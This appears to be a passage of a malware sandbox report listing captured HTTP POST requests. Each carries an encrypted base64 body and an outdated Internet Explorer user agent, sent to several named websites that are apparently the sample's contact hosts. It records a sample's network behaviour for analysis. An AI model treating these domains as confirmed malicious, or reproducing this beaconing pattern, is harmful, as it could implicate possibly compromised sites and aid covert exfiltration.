pI90+Ndw4PyryoY0xljJhSDpD+ANYibr+5mKUPqf/9BnMbd4cVbJCDQNv2j84gLfMkLVKcVfTypl71Y69HpQCEKkKpAHWbpiQAgyI1YuDgrfUeblPNNyVVLJGLUC61vHpMVuqDBnspwwFC2DwP2VPZ6GmfMo1OJ7j9w4YjRPZWb+uQ/Lh3QzSAc8C7opiQZDIPPT3ku21qtqG8Xq6urptLDFKZf536puTSvzceD3hg0imtZuI8GIgX92KmWPukIVnGRaBObgDIWgBFt1ZEmwQ5BKF3OvVeNr+9RhBq5KyTfVX/Mgr9x4f/oPw8ejm6aKvm45w+Q1u1kTvbweeF5ZVj4nicA0Mqed65/gaHvfEHKgLkLzjzSWiWZZAQ+KrF8pzU/FIsEir5nAjiyB0EdcxG3xOBd6QxDocjN1NJC0AohGMt8loSC7s5XXDF4+N8qfvArZO/8dVFE0QDHtBvEAZExqmMfYW4But1Fpjow2NOhw4KI1cb0NX2GGe55HCxFbMY3I4T0Zife/iBdxcuR9A9mPpHgun2roBUC1778utJel57aJ7m66vKoxK+tazw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 43 73 53 4a 47 45 63 72 32 66 77 4a 61 4d 66 46 64 6d 2b 6a 31 42 41 39 77 78 59 39 68 53 4a 59 61 30 4f 57 79 78 48 73 76 38 30 46 56 4c 37 6f 47 45 34 5a 6b 38 43 76 51 41 54 45 45 69 65 4c 7a 35 70 6f 6c 32 52 6c 6c 7a 61 6f 66 42 5a 53 62 65 33 4a 61 2f 65 53 42 54 4e 32 61 54 76 41 48 77 35 37 43 54 4c 2f 47 46 6e 4a 6d 75 43 78 4c 56 75 70 4b 71 68 59 69 38 31 4c 58 33 75 67 41 46 39 4f 72 56 4c 4a 75 5a 56 6b 31 51 2f 52 66 73 78 68 69 56 71 7a 64 64 6b 71 76 54 4c 30 6e 7a 38 59 6a 6f 67 69 54 61 53 42 6b 4a 78 34 44 62 53 67 41 77 33 58 58 67 4e 51 51 47 44 6d 44 5a 6b 4b 47 48 68 31 7a 43 52 55 6c 70 32 70 6f 4c 4c 59 66 34 2b 39 6e 7a 56 64 61 4e 6d 46 49 64 6b 46 66 45 4d 2b 55 52 57 58 30 6c 73 4f 78 46 67 36 36 33 52 31 6b 31 52 72 48 50 74 37 73 52 33 54 44 32 47 65 36 42 2b 6d 35 6e 70 61 58 58 39 51 4a 54 63 31 4d 43 2b 2b 62 4d 72 70 71 46 4a 78 63 68 33 56 54 48 52 67 44 4a 4e 4b 4b 33 73 4f 41 53 4b 46 6c 4e 51 56 4e 33 45 4a 34 47 6b 6a 39 77 30 32 2b 2f 45 46 55 2b 6e 77 59 4a 51 2f 68 70 35 41 78 75 51 55 78 45 71 4e 48 32 30 61 4c 32 66 4a 4b 67 6d 6c 4b 66 47 76 49 48 78 6a 6b 44 5a 70 4d 39 63 6f 53 6b 6c 33 66 65 34 31 59 75 76 6f 30 48 71 43 52 76 52 4e 4e 56 35 34 62 2b 42 55 78 70 64 6d 74 38 62 71 61 6d 7a 74 45 4a 6d 71 58 35 57 38 7a 30 74 62 49 70 58 41 70 63 61 73 61 64 58 5a 37 55 2f 2b 73 39 4b 50 6b 59 6b 31 57 43 4d 31 2b 50 39 49 65 75 50 61 4c 33 51 4f 42 77 6a 71 4a 77 68 6f 67 50 5a 69 66 48 6e 78 73 75 42 71 2f 73 6a 74 52 47 4f 38 35 4f 6d 33 79 32 6c 59 6c 50 5a 2f 6a 2f 4a 5a 46 61 6e 70 6b 77 38 38 71 52 78 35 31 71 62 6b 68 38 68 6a 69 57 4a 6d 30 30 2b 4a 6c 4a 49 62 4b 77 67 58 68 39 30 66 6c 70 6a 67 4c 42 76 2f 7a 45 57 34 34 62 77 5a 77 4b 43 37 66 32 6a 69 42 77 79 71 57 56 48 44 36 35 50 45 69 43 35 65 63 4e 44 75 33 67 3d 3d Data Ascii: CsSJGEcr2fwJaMfFdm+j1BA9wxY9hSJYa0OWyxHsv80FVL7oGE4Zk8CvQATEEieLz5pol2RllzaofBZSbe3Ja/eSBTN2aTvAHw57CTL/GFnJmuCxLVupKqhYi81LX3ugAF9OrVLJuZVk1Q/RfsxhiVqzddkqvTL0nz8YjogiTaSBkJx4DbSgAw3XXgNQQGDmDZkKGHh1zCRUlp2poLLYf4+9nzVdaNmFIdkFfEM+URWX0lsOxFg663R1k1RrHPt7sR3TD2Ge6B+m5npaXX9QJTc1MC++bMrpqFJxch3VTHRgDJNKK3sOASKFlNQVN3EJ4Gkj9w02+/EFU+nwYJQ/hp5AxuQUxEqNH20aL2fJKgmlKfGvIHxjkDZpM9coSkl3fe41Yuvo0HqCRvRNNV54b+BUxpdmt8bqamztEJmqX5W8z0tbIpXApcasadXZ7U/+s9KPkYk1WCM1+P9IeuPaL3QOBwjqJwhogPZifHnxsuBq/sjtRGO85Om3y2lYlPZ/j/JZFanpkw88qRx51qbkh8hjiWJm00+JlJIbKwgXh90flpjgLBv/zEW44bwZwKC7f2jiBwyqWVHD65PEiC5ecNDu3g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 67 36 35 67 47 70 49 36 32 66 77 75 67 2f 39 41 52 52 67 50 57 5a 56 4a 74 44 48 69 71 53 66 36 35 70 6e 66 74 76 4b 49 64 33 4b 6a 62 7a 5a 7a 58 4d 4e 45 63 48 30 6d 47 59 31 71 4d 4d 56 78 53 5a 44 55 34 79 6d 30 47 63 56 55 70 48 71 6f 66 6e 63 65 79 61 46 48 2b 5a 6f 47 33 32 34 30 78 55 43 6a 32 52 37 6b 76 77 6d 34 61 68 7a 30 43 56 51 65 51 4b 70 64 6a 6a 6b 36 33 64 43 54 65 36 43 65 71 69 6f 6e 68 37 34 62 50 30 38 6e 4b 2f 44 4c 6c 6e 6d 4f 50 62 39 39 51 4f 55 4e 6a 76 6f 4b 7a 38 77 41 76 30 52 73 4e 41 56 39 50 51 48 32 56 48 50 46 41 42 76 57 61 61 50 54 38 65 42 31 58 42 68 51 77 36 46 61 52 54 39 4b 35 31 42 53 75 76 70 54 42 2f 59 72 34 48 36 47 37 4e 61 68 69 68 72 36 6c 69 41 73 38 39 49 70 73 39 6c 73 4a 50 38 69 38 73 39 31 2f 53 7a 4e 53 30 59 2f 31 56 75 42 6d 45 33 74 56 4b 68 6f 32 37 6c 36 66 69 45 71 51 41 32 76 62 35 61 6d 47 33 4a 6d 4f 62 72 74 6f 54 71 46 58 64 42 33 31 6d 67 70 59 4b 6f 56 34 43 56 73 4c 48 72 49 33 39 75 7a 6e 6f 43 32 36 2f 4e 74 44 45 41 59 39 6f 52 37 76 4e 59 52 6a 4f 65 44 48 46 59 73 53 2b 71 4a 49 42 47 6c 56 4a 74 79 43 61 69 51 39 61 45 57 56 34 32 49 54 52 30 57 4b 2b 55 51 43 4e 6b 6f 39 76 55 63 38 48 2b 6c 76 47 45 48 47 74 77 36 61 6e 43 4b 36 2f 6d 74 33 74 4e 30 78 58 6a 6e 4d 47 47 35 57 65 70 48 57 6e 7a 54 35 6b 37 7a 55 73 51 7a 67 61 2b 46 77 4f 6e 54 4f 63 35 43 58 62 4d 6e 51 49 38 74 52 59 5a 63 52 6c 49 4b 53 76 39 77 4a 75 79 43 30 75 2f 55 73 74 7a 48 33 59 6c 52 31 50 43 61 71 36 4f 6f 43 31 36 49 55 68 61 36 64 5a 42 73 71 59 36 6f 32 64 4e 72 4a 5a 76 47 48 64 35 6f 56 71 5a 6e 6e 4a 50 49 34 44 2b 62 37 5a 75 34 59 4f 47 53 56 31 46 4b 51 67 6e 56 76 61 6b 44 46 2f 36 2b 7a 55 77 49 55 4d 42 2f 72 61 6c 47 44 59 44 79 39 48 31 30 70 63 31 44 34 4e 39 6d 4e 41 30 47 2b 42 44 45 4d 49 48 4e 4e 36 76 4b Data Ascii: g65gGpI62fwug/9ARRgPWZVJtDHiqSf65pnftvKId3KjbzZzXMNEcH0mGY1qMMVxSZDU4ym0GcVUpHqofnceyaFH+ZoG3240xUCj2R7kvwm4ahz0CVQeQKpdjjk63dCTe6Ceqionh74bP08nK/DLlnmOPb99QOUNjvoKz8wAv0RsNAV9PQH2VHPFABvWaaPT8eB1XBhQw6FaRT9K51BSuvpTB/Yr4H6G7Nahihr6liAs89Ips9lsJP8i8s91/SzNS0Y/1VuBmE3tVKho27l6fiEqQA2vb5amG3JmObrtoTqFXdB31mgpYKoV4CVsLHrI39uznoC26/NtDEAY9oR7vNYRjOeDHFYsS+qJIBGlVJtyCaiQ9aEWV42ITR0WK+UQCNko9vUc8H+lvGEHGtw6anCK6/mt3tN0xXjnMGG5WepHWnzT5k7zUsQzga+FwOnTOc5CXbMnQI8tRYZcRlIKSv9wJuyC0u/UstzH3YlR1PCaq6OoC16IUha6dZBsqY6o2dNrJZvGHd5oVqZnnJPI4D+b7Zu4YOGSV1FKQgnVvakDF/6+zUwIUMB/ralGDYDy9H10pc1D4N9mNA0G+BDEMIHNN6vK
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 580User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.lrsuk.comCache-Control: no-cacheData Raw: 37 58 77 52 79 4e 41 75 35 2f 77 4f 34 69 6b 32 59 7a 4d 6a 77 34 50 53 51 44 37 34 50 58 2b 56 42 43 4e 34 39 56 4b 37 4e 63 6d 65 5a 53 39 31 54 56 39 53 71 48 55 6a 5a 76 54 69 68 66 37 6a 4a 46 46 79 6d 6f 44 5a 6b 44 4e 53 7a 5a 6c 4d 76 6a 71 67 43 61 76 78 6f 4c 34 6e 2b 4c 66 73 4d 56 37 6f 72 58 43 67 38 32 65 55 68 65 41 4e 2b 2b 78 57 69 6d 54 53 41 36 32 79 45 57 79 39 41 4f 75 42 33 78 70 65 4b 58 54 78 38 76 41 32 35 33 56 4a 62 6b 63 55 49 54 36 31 50 6f 5a 49 70 6d 53 7a 72 30 64 5a 52 6f 55 4c 31 62 69 67 6a 64 64 50 62 4f 4f 47 51 32 35 70 4e 48 42 34 79 58 68 46 30 61 6b 50 4a 68 50 6d 58 33 54 51 55 75 66 4a 2b 76 75 66 55 4d 69 65 30 47 64 78 68 51 72 4e 53 73 5a 72 4b 71 62 55 44 4f 78 4d 32 37 41 69 45 63 68 6b 59 41 48 6c 58 6b 2f 31 75 65 2b 63 56 52 68 72 47 37 41 4b 6c 47 38 45 2f 57 46 4f 78 65 4a 74 65 54 5a 6e 57 6d 33 7a 61 4d 77 4a 78 4e 36 6f 71 72 6d 6c 2f 62 4e 34 43 6b 39 43 4d 61 70 61 62 7a 56 6b 64 65 44 61 43 71 69 6b 67 61 34 39 42 63 57 77 48 62 37 34 49 74 66 63 5a 5a 41 69 61 44 49 57 78 5a 6c 39 2b 72 7a 32 70 38 4d 66 45 79 7a 58 38 75 46 74 63 69 48 54 79 78 49 67 66 56 4b 72 64 47 76 61 6b 48 4d 59 69 6b 2b 36 41 78 7a 69 64 6b 57 72 68 2f 62 42 68 45 2f 63 69 61 35 72 4a 61 46 66 58 36 6c 54 53 6c 4b 66 54 54 53 6b 37 7a 53 41 68 6a 69 4e 34 71 62 47 65 63 70 6d 43 65 4f 31 4d 64 34 33 59 74 4f 47 42 73 76 34 64 6f 6f 47 45 6e 61 4b 76 2f 70 6d 6f 58 57 48 48 4f 6d 41 30 63 67 79 49 56 78 38 67 33 39 75 65 4f 55 6c 49 76 4e 4e 54 49 39 41 6a 35 53 4b 64 6a 6f 55 66 33 4b 4c 57 42 65 6f 6f 5a 6f 51 73 52 6c 73 6f 63 39 76 6b 4b 67 43 56 32 79 56 34 74 45 6b 4e 68 73 79 30 37 6c 4d 45 2b 51 6d 52 34 69 7a 4d 6c 2b 6c 53 32 77 52 6a 6d 76 70 6c 2f 4a 77 38 76 73 30 Data Ascii: 7XwRyNAu5/wO4ik2YzMjw4PSQD74PX+VBCN49VK7NcmeZS91TV9SqHUjZvTihf7jJFFymoDZkDNSzZlMvjqgCavxoL4n+LfsMV7orXCg82eUheAN++xWimTSA62yEWy9AOuB3xpeKXTx8vA253VJbkcUIT61PoZIpmSzr0dZRoUL1bigjddPbOOGQ25pNHB4yXhF0akPJhPmX3TQUufJ+vufUMie0GdxhQrNSsZrKqbUDOxM27AiEchkYAHlXk/1ue+cVRhrG7AKlG8E/WFOxeJteTZnWm3zaMwJxN6oqrml/bN4Ck9CMapabzVkdeDaCqikga49BcWwHb74ItfcZZAiaDIWxZl9+rz2p8MfEyzX8uFtciHTyxIgfVKrdGvakHMYik+6AxzidkWrh/bBhE/cia5rJaFfX6lTSlKfTTSk7zSAhjiN4qbGecpmCeO1Md43YtOGBsv4dooGEnaKv/pmoXWHHOmA0cgyIVx8g39ueOUlIvNNTI9Aj5SKdjoUf3KLWBeooZoQsRlsoc9vkKgCV2yV4tEkNhsy07lME+QmR4izMl+lS2wRjmvpl/Jw8vs0
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.ora-ito.comCache-Control: no-cacheData Raw: 43 73 53 4a 47 45 63 72 32 66 77 4a 61 4d 66 46 64 6d 2b 6a 31 42 41 39 77 78 59 39 68 53 4a 59 61 30 4f 57 79 78 48 73 76 38 30 46 56 4c 37 6f 47 45 34 5a 6b 38 43 76 51 41 54 45 45 69 65 4c 7a 35 70 6f 6c 32 52 6c 6c 7a 61 6f 66 42 5a 53 62 65 33 4a 61 2f 65 53 42 54 4e 32 61 54 76 41 48 77 35 37 43 54 4c 2f 47 46 6e 4a 6d 75 43 78 4c 56 75 70 4b 71 68 59 69 38 31 4c 58 33 75 67 41 46 39 4f 72 56 4c 4a 75 5a 56 6b 31 51 2f 52 66 73 78 68 69 56 71 7a 64 64 6b 71 76 54 4c 30 6e 7a 38 59 6a 6f 67 69 54 61 53 42 6b 4a 78 34 44 62 53 67 41 77 33 58 58 67 4e 51 51 47 44 6d 44 5a 6b 4b 47 48 68 31 7a 43 52 55 6c 70 32 70 6f 4c 4c 59 66 34 2b 39 6e 7a 56 64 61 4e 6d 46 49 64 6b 46 66 45 4d 2b 55 52 57 58 30 6c 73 4f 78 46 67 36 36 33 52 31 6b 31 52 72 48 50 74 37 73 52 33 54 44 32 47 65 36 42 2b 6d 35 6e 70 61 58 58 39 51 4a 54 63 31 4d 43 2b 2b 62 4d 72 70 71 46 4a 78 63 68 33 56 54 48 52 67 44 4a 4e 4b 4b 33 73 4f 41 53 4b 46 6c 4e 51 56 4e 33 45 4a 34 47 6b 6a 39 77 30 32 2b 2f 45 46 55 2b 6e 77 59 4a 51 2f 68 70 35 41 78 75 51 55 78 45 71 4e 48 32 30 61 4c 32 66 4a 4b 67 6d 6c 4b 66 47 76 49 48 78 6a 6b 44 5a 70 4d 39 63 6f 53 6b 6c 33 66 65 34 31 59 75 76 6f 30 48 71 43 52 76 52 4e 4e 56 35 34 62 2b 42 55 78 70 64 6d 74 38 62 71 61 6d 7a 74 45 4a 6d 71 58 35 57 38 7a 30 74 62 49 70 58 41 70 63 61 73 61 64 58 5a 37 55 2f 2b 73 39 4b 50 6b 59 6b 31 57 43 4d 31 2b 50 39 49 65 75 50 61 4c 33 51 4f 42 77 6a 71 4a 77 68 6f 67 50 5a 69 66 48 6e 78 73 75 42 71 2f 73 6a 74 52 47 4f 38 35 4f 6d 33 79 32 6c 59 6c 50 5a 2f 6a 2f 4a 5a 46 61 6e 70 6b 77 38 38 71 52 78 35 31 71 62 6b 68 38 68 6a 69 57 4a 6d 30 30 2b 4a 6c 4a 49 62 4b 77 67 58 68 39 30 66 6c 70 6a 67 4c 42 76 2f 7a 45 57 34 34 62 77 5a 77 4b 43 37 66 32 6a 69 42 77 79 71 57 56 48 44 36 35 50 45 69 43 35 65 63 4e 44 75 33 67 3d 3d Data Ascii: CsSJGEcr2fwJaMfFdm+j1BA9wxY9hSJYa0OWyxHsv80FVL7oGE4Zk8CvQATEEieLz5pol2RllzaofBZSbe3Ja/eSBTN2aTvAHw57CTL/GFnJmuCxLVupKqhYi81LX3ugAF9OrVLJuZVk1Q/RfsxhiVqzddkqvTL0nz8YjogiTaSBkJx4DbSgAw3XXgNQQGDmDZkKGHh1zCRUlp2poLLYf4+9nzVdaNmFIdkFfEM+URWX0lsOxFg663R1k1RrHPt7sR3TD2Ge6B+m5npaXX9QJTc1MC++bMrpqFJxch3VTHRgDJNKK3sOASKFlNQVN3EJ4Gkj9w02+/EFU+nwYJQ/hp5AxuQUxEqNH20aL2fJKgmlKfGvIHxjkDZpM9coSkl3fe41Yuvo0HqCRvRNNV54b+BUxpdmt8bqamztEJmqX5W8z0tbIpXApcasadXZ7U/+s9KPkYk1WCM1+P9IeuPaL3QOBwjqJwhogPZifHnxsuBq/sjtRGO85Om3y2lYlPZ/j/JZFanpkw88qRx51qbkh8hjiWJm00+JlJIbKwgXh90flpjgLBv/zEW44bwZwKC7f2jiBwyqWVHD65PEiC5ecNDu3g==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 600User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.pwd.orgCache-Control: no-cacheData Raw: 39 37 71 34 47 6d 38 39 32 66 7a 48 47 4a 49 7a 6a 6b 7a 49 6f 58 69 5a 46 61 36 46 5a 6b 76 65 45 2b 7a 72 32 43 31 4d 6b 42 47 4b 4a 67 46 56 67 62 37 42 68 77 4a 35 30 64 74 54 50 4e 72 49 67 64 5a 43 4c 51 71 46 4e 4a 56 4c 6e 41 4f 2b 4e 74 77 4d 77 6c 49 70 68 75 34 42 6f 46 52 63 59 58 47 6c 66 6a 42 51 4f 33 47 65 57 6f 77 33 41 78 57 35 47 46 39 75 37 6a 48 71 4e 71 6e 53 65 79 53 50 78 39 41 33 2b 65 61 49 48 6c 63 52 50 71 78 42 43 4a 58 4d 37 6a 43 6e 77 57 77 2b 75 57 58 46 36 7a 4a 61 6e 75 35 56 42 63 70 6c 77 6b 4e 63 44 35 61 64 5a 6d 33 50 55 74 69 57 45 54 55 51 2f 67 57 7a 32 4a 39 37 6b 62 4d 57 45 35 45 36 71 53 49 77 2f 44 63 52 37 59 70 35 4a 6e 7a 68 59 74 4c 45 63 4c 56 31 42 41 4d 38 49 34 56 31 49 51 2f 4a 58 6f 38 6f 34 41 32 58 57 67 62 69 33 30 70 35 70 2f 78 65 6e 4a 4e 67 37 32 52 55 33 46 61 54 38 56 6b 75 54 6b 57 78 38 41 72 78 66 31 74 72 62 2b 55 7a 56 78 50 47 6c 48 45 72 61 34 70 31 44 5a 67 53 71 42 4b 42 61 72 49 44 41 43 55 72 66 41 51 57 74 71 51 4f 47 54 6c 71 4f 57 4d 45 6e 49 61 46 6b 57 55 51 4b 2f 6d 41 38 77 59 42 4d 2b 55 66 4e 5a 63 63 53 5a 56 55 42 63 2b 4d 5a 69 51 4e 4f 6e 78 2b 67 50 74 31 43 57 4a 46 45 47 5a 76 39 2f 54 4e 50 4e 50 57 34 70 45 6d 74 35 43 64 5a 4e 44 53 6a 50 59 77 45 65 61 33 33 67 45 72 6e 51 62 36 4f 6b 54 48 69 63 53 73 6b 45 2f 49 46 51 4d 48 2b 51 79 6c 76 74 67 67 58 39 44 61 51 38 36 69 4d 56 42 6f 37 51 68 33 53 32 71 72 4c 51 6c 4a 50 6d 51 61 47 74 43 6e 43 66 65 67 34 61 6f 45 49 48 65 6f 49 4a 34 4d 41 4c 56 43 6f 59 30 55 49 38 41 39 33 4c 64 31 4a 4d 59 55 4c 7a 46 4a 6a 6e 6b 37 42 61 58 54 48 4c 33 49 41 74 72 70 6b 4e 33 42 34 49 47 2f 79 32 64 2f 36 53 70 6c 7a 6c 45 64 58 51 48 68 55 67 4c 4b 34 50 62 4c 36 43 4b 45 51 53 4e 5a 69 5a 4b 65 35 64 57 55 49 59 6b 41 54 45 38 3d Data Ascii: 97q4Gm892fzHGJIzjkzIoXiZFa6FZkveE+zr2C1MkBGKJgFVgb7BhwJ50dtTPNrIgdZCLQqFNJVLnAO+NtwMwlIphu4BoFRcYXGlfjBQO3GeWow3AxW5GF9u7jHqNqnSeySPx9A3+eaIHlcRPqxBCJXM7jCnwWw+uWXF6zJanu5VBcplwkNcD5adZm3PUtiWETUQ/gWz2J97kbMWE5E6qSIw/DcR7Yp5JnzhYtLEcLV1BAM8I4V1IQ/JXo8o4A2XWgbi30p5p/xenJNg72RU3FaT8VkuTkWx8Arxf1trb+UzVxPGlHEra4p1DZgSqBKBarIDACUrfAQWtqQOGTlqOWMEnIaFkWUQK/mA8wYBM+UfNZccSZVUBc+MZiQNOnx+gPt1CWJFEGZv9/TNPNPW4pEmt5CdZNDSjPYwEea33gErnQb6OkTHicSskE/IFQMH+QylvtggX9DaQ86iMVBo7Qh3S2qrLQlJPmQaGtCnCfeg4aoEIHeoIJ4MALVCoY0UI8A93Ld1JMYULzFJjnk7BaXTHL3IAtrpkN3B4IG/y2d/6SplzlEdXQHhUgLK4PbL6CKEQSNZiZKe5dWUIYkATE8=
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 568User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.stajum.comCache-Control: no-cacheData Raw: 76 34 39 50 7a 78 49 71 78 76 7a 67 71 68 70 52 78 55 49 45 49 78 56 6c 4d 43 39 69 54 2b 72 37 5a 73 47 76 4b 31 54 76 51 35 74 57 64 4b 2f 2b 43 42 72 31 49 79 6e 38 72 53 72 4c 47 77 4e 6c 72 76 30 71 34 58 7a 34 51 35 39 4a 57 57 55 54 65 76 6e 2f 62 37 6b 6b 61 4c 58 34 32 30 72 4b 54 79 73 42 4f 62 6c 72 5a 35 56 33 66 65 6c 79 38 45 30 45 74 2b 51 57 59 30 6e 6e 39 30 35 44 58 46 69 59 52 46 6b 2f 5a 62 66 4d 6c 74 48 75 4c 4a 72 37 51 4f 76 59 4c 31 62 75 55 72 61 70 79 49 36 38 2f 41 48 36 65 53 79 4e 61 64 6d 39 4a 4b 50 64 6d 2f 76 64 43 76 46 59 65 37 4e 2f 50 34 70 5a 2b 6a 68 55 6c 4f 64 54 6e 32 31 43 75 73 36 4f 54 4b 30 7a 37 64 6f 76 55 35 50 6a 48 71 55 62 55 73 75 6d 73 4c 4c 5a 64 4e 69 33 63 5a 68 4a 30 66 31 74 73 6a 79 63 39 6c 53 6c 75 6d 75 6a 71 2f 55 59 53 77 41 48 34 64 51 72 63 50 57 6c 56 30 48 79 71 48 58 6b 6c 4a 4e 74 45 4c 4e 63 70 4e 67 6e 54 70 4f 62 45 66 41 33 5a 74 4e 6a 6f 69 6b 36 4a 4b 63 35 48 73 4d 36 66 44 48 74 33 4b 31 51 36 63 67 43 7a 6d 52 31 68 74 30 73 43 5a 46 59 5a 47 66 43 64 34 35 58 48 75 64 57 45 45 47 41 55 4c 32 65 69 77 36 2f 50 31 2b 34 57 31 53 64 50 63 56 49 39 54 62 55 4d 6b 53 67 53 76 72 4c 6e 58 50 4d 63 47 41 71 46 7a 30 65 7a 30 6a 6d 31 33 6c 7a 63 71 39 39 78 76 45 4d 2b 41 38 72 75 7a 4c 62 30 78 50 32 4c 64 47 69 63 45 42 52 6b 35 6f 66 57 48 55 77 51 6c 79 75 67 59 75 71 2b 35 39 78 51 70 6a 59 79 4b 4f 51 4f 77 76 77 57 59 4e 77 41 65 33 55 61 44 59 4f 6f 79 63 74 68 78 77 6b 78 56 4b 52 66 33 5a 6d 73 48 45 50 4a 58 36 4f 55 72 55 63 39 4b 38 34 6c 6e 71 73 33 77 67 36 6b 67 30 31 56 67 75 76 76 4d 6b 32 31 7a 68 66 2f 69 35 75 76 2b 41 39 78 53 44 38 6a 55 72 2f 4c 42 71 56 64 44 70 78 52 77 3d 3d Data Ascii: v49PzxIqxvzgqhpRxUIEIxVlMC9iT+r7ZsGvK1TvQ5tWdK/+CBr1Iyn8rSrLGwNlrv0q4Xz4Q59JWWUTevn/b7kkaLX420rKTysBOblrZ5V3fely8E0Et+QWY0nn905DXFiYRFk/ZbfMltHuLJr7QOvYL1buUrapyI68/AH6eSyNadm9JKPdm/vdCvFYe7N/P4pZ+jhUlOdTn21Cus6OTK0z7dovU5PjHqUbUsumsLLZdNi3cZhJ0f1tsjyc9lSlumujq/UYSwAH4dQrcPWlV0HyqHXklJNtELNcpNgnTpObEfA3ZtNjoik6JKc5HsM6fDHt3K1Q6cgCzmR1ht0sCZFYZGfCd45XHudWEEGAUL2eiw6/P1+4W1SdPcVI9TbUMkSgSvrLnXPMcGAqFz0ez0jm13lzcq99xvEM+A8ruzLb0xP2LdGicEBRk5ofWHUwQlyugYuq+59xQpjYyKOQOwvwWYNwAe3UaDYOoycthxwkxVKRf3ZmsHEPJX6OUrUc9K84lnqs3wg6kg01VguvvMk21zhf/i5uv+A9xSD8jUr/LBqVdDpxRw==
                      Source: global trafficHTTP traffic detected: POST / HTTP/1.1Accept: */*Accept-Language: en-usContent-Type: application/octet-streamContent-Length: 604User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)Host: www.fe-bauer.deCache-Control: no-cacheData Raw: 67 36 35 67 47 70 49 36 32 66 77 75 67 2f 39 41 52 52 67 50 57 5a 56 4a 74 44 48 69 71 53 66 36 35 70 6e 66 74 76 4b 49 64 33 4b 6a 62 7a 5a 7a 58 4d 4e 45 63 48 30 6d 47 59 31 71 4d 4d 56 78 53 5a 44 55 34 79 6d 30 47 63 56 55 70 48 71 6f 66 6e 63 65 79 61 46 48 2b 5a 6f 47 33 32 34 30 78 55 43 6a 32 52 37 6b 76 77 6d 34 61 68 7a 30 43 56 51 65 51 4b 70 64 6a 6a 6b 36 33 64 43 54 65 36 43 65 71 69 6f 6e 68 37 34 62 50 30 38 6e 4b 2f 44 4c 6c 6e 6d 4f 50 62 39 39 51 4f 55 4e 6a 76 6f 4b 7a 38 77 41 76 30 52 73 4e 41 56 39 50 51 48 32 56 48 50 46 41 42 76 57 61 61 50 54 38 65 42 31 58 42 68 51 77 36 46 61 52 54 39 4b 35 31 42 53 75 76 70 54 42 2f 59 72 34 48 36 47 37 4e 61 68 69 68 72 36 6c 69 41 73 38 39 49 70 73 39 6c 73 4a 50 38 69 38 73 39 31 2f 53 7a 4e 53 30 59 2f 31 56 75 42 6d 45 33 74 56 4b 68 6f 32 37 6c 36 66 69 45 71 51 41 32 76 62 35 61 6d 47 33 4a 6d 4f 62 72 74 6f 54 71 46 58 64 42 33 31 6d 67 70 59 4b 6f 56 34 43 56 73 4c 48 72 49 33 39 75 7a 6e 6f 43 32 36 2f 4e 74 44 45 41 59 39 6f 52 37 76 4e 59 52 6a 4f 65 44 48 46 59 73 53 2b 71 4a 49 42 47 6c 56 4a 74 79 43 61 69 51 39 61 45 57 56 34 32 49 54 52 30 57 4b 2b 55 51 43 4e 6b 6f 39 76 55 63 38 48 2b 6c 76 47 45 48 47 74 77 36 61 6e 43 4b 36 2f 6d 74 33 74 4e 30 78 58 6a 6e 4d 47 47 35 57 65 70 48 57 6e 7a 54 35 6b 37 7a 55 73 51 7a 67 61 2b 46 77 4f 6e 54 4f 63 35 43 58 62 4d 6e 51 49 38 74 52 59 5a 63 52 6c 49 4b 53 76 39 77 4a 75 79 43 30 75 2f 55 73 74 7a 48 33 59 6c 52 31 50 43 61 71 36 4f 6f 43 31 36 49 55 68 61 36 64 5a 42 73 71 59 36 6f 32 64 4e 72 4a 5a 76 47 48 64 35 6f 56 71 5a 6e 6e 4a 50 49 34 44 2b 62 37 5a 75 34 59 4f 47 53 56 31 46 4b 51 67 6e 56 76 61 6b 44 46 2f 36 2b 7a 55 77 49 55 4d 42 2f 72 61 6c 47 44 59 44 79 39 48 31 30 70 63 31 44 34 4e 39 6d 4e 41 30 47 2b 42 44 45 4d 49 48 4e 4e 36 76 4b Data Ascii: g65gGpI62fwug/9ARRgPWZVJtDHiqSf65pnftvKId3KjbzZzXMNEcH0mGY1qMMVxSZDU4ym0GcVUpHqofnceyaFH+ZoG3240xUCj2R7kvwm4ahz0CVQeQKpdjjk63dCTe6Ceqionh74bP08nK/DLlnmOPb99QOUNjvoKz8wAv0RsNAV9PQH2VHPFABvWaaPT8eB1XBhQw6FaRT9K51BSuvpTB/Yr4H6G7Nahihr6liAs89Ips9lsJP8i8s91/SzNS0Y/1VuBmE3tVKho27l6fiEqQA2vb5amG3JmObrtoTqFXdB31mgpYKoV4CVsLHrI39uznoC26/NtDEAY9oR7vNYRjOeDHFYsS+qJIBGlVJtyCaiQ9aEWV42ITR0WK+UQCNko9vUc8H+lvGEHGtw6anCK6/mt3tN0xXjnMGG5WepHWnzT5k7zUsQzga+FwOnTOc5CXbMnQI8tRYZcRlIKSv9wJuyC0u/UstzH3YlR1PCaq6OoC16IUha6dZBsqY6o2dNrJZvGHd5oVqZnnJPI4D+b7Zu4YOGSV1FKQgnVvakDF/6+zUwIUMB/ralGDYDy9H10pc1D4N9mNA0G+BDEMIHNN6vK
